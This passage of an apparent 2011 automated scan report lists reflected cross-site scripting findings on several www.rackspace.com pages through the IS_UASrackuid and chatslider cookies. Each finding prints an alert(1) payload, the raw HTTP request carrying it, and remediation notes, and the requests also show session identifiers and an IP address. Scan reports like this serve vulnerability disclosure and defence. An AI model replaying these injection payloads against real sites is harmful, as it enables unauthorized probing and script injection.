exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81f8c"%3balert(1)//f64380ecae1 was submitted in the IS_UASrackuid cookie. This input was echoed as 81f8c";alert(1)//f64380ecae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f881f8c"%3balert(1)//f64380ecae1; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d66c5"><script>alert(1)</script>448a15f3ee5 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d66c5"><script>alert(1)</script>448a15f3ee5; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6814"><script>alert(1)</script>5315014625 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dd6814"><script>alert(1)</script>5315014625; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8e5e"%3balert(1)//7d155523240 was submitted in the chatslider cookie. This input was echoed as a8e5e";alert(1)//7d155523240 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Da8e5e"%3balert(1)//7d155523240; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e398a"><script>alert(1)</script>fa4079450c0 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/datacenters.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e398a"><script>alert(1)</script>fa4079450c0; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c267a"%3balert(1)//fac2b42b946 was submitted in the IS_UASrackuid cookie. This input was echoed as c267a";alert(1)//fac2b42b946 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/datacenters.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c267a"%3balert(1)//fac2b42b946; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84b62"%3balert(1)//d6e7b783043 was submitted in the chatslider cookie. This input was echoed as 84b62";alert(1)//d6e7b783043 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/datacenters.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D84b62"%3balert(1)//d6e7b783043; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c9e3"><script>alert(1)</script>1e8d5b8536e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/datacenters.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2c9e3"><script>alert(1)</script>1e8d5b8536e; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a48e"><script>alert(1)</script>30eacb06026 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84a48e"><script>alert(1)</script>30eacb06026; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 780c7"%3balert(1)//7931b2aafd3 was submitted in the IS_UASrackuid cookie. This input was echoed as 780c7";alert(1)//7931b2aafd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8780c7"%3balert(1)//7931b2aafd3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b54e"><script>alert(1)</script>d4066810c3f was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /whyrackspace/network/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D7b54e"><script>alert(1)</script>d4066810c3f; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53282"%3balert(1)//32458e3be1a was submitted in the chatslider cookie. This input was echoed as 53282";alert(1)//32458e3be1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/network/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D53282"%3balert(1)//32458e3be1a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f635"%3balert(1)//e3b3b22ddba was submitted in the IS_UASrackuid cookie. This input was echoed as 2f635";alert(1)//e3b3b22ddba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whyrackspace/support/fanati/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f82f635"%3balert(1)//e3b3b22ddba; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:11:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
